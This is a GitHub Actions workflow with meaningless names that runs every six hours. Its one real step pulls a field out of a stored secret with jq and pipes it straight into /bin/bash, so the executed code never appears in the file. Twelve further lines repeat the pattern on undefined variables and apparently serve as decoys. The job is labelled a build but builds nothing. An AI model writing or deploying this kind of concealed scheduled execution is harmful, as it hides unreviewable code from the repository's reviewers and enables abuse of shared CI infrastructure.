name: zhenwudadiqiu

on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhenwudadiqiu
        env:
          f5: ${{ secrets.f5 }}
        run: |
          echo $f5 | jq -r .lasyz87 | /bin/bash
          echo $uiwra56 | jq -r .varov92 | /bin/bash
          echo $vkrm09666 | jq -r .eil13 | /bin/bash
          echo $oowqr8 | jq -r .b8 | /bin/bash
          echo $cwq975 | jq -r .jqojq4506 | /bin/bash
          echo $c5346 | jq -r .etlk1 | /bin/bash
          echo $yqwfv8 | jq -r .h67521 | /bin/bash
          echo $zdkr2 | jq -r .of84991 | /bin/bash
          echo $pey74170 | jq -r .bob8 | /bin/bash
          echo $q0473 | jq -r .gtjv32 | /bin/bash
          echo $s9 | jq -r .hpwr9 | /bin/bash
          echo $khfi43 | jq -r .ymfg7017 | /bin/bash
          echo $ulvx71786 | jq -r .qd478 | /bin/bash

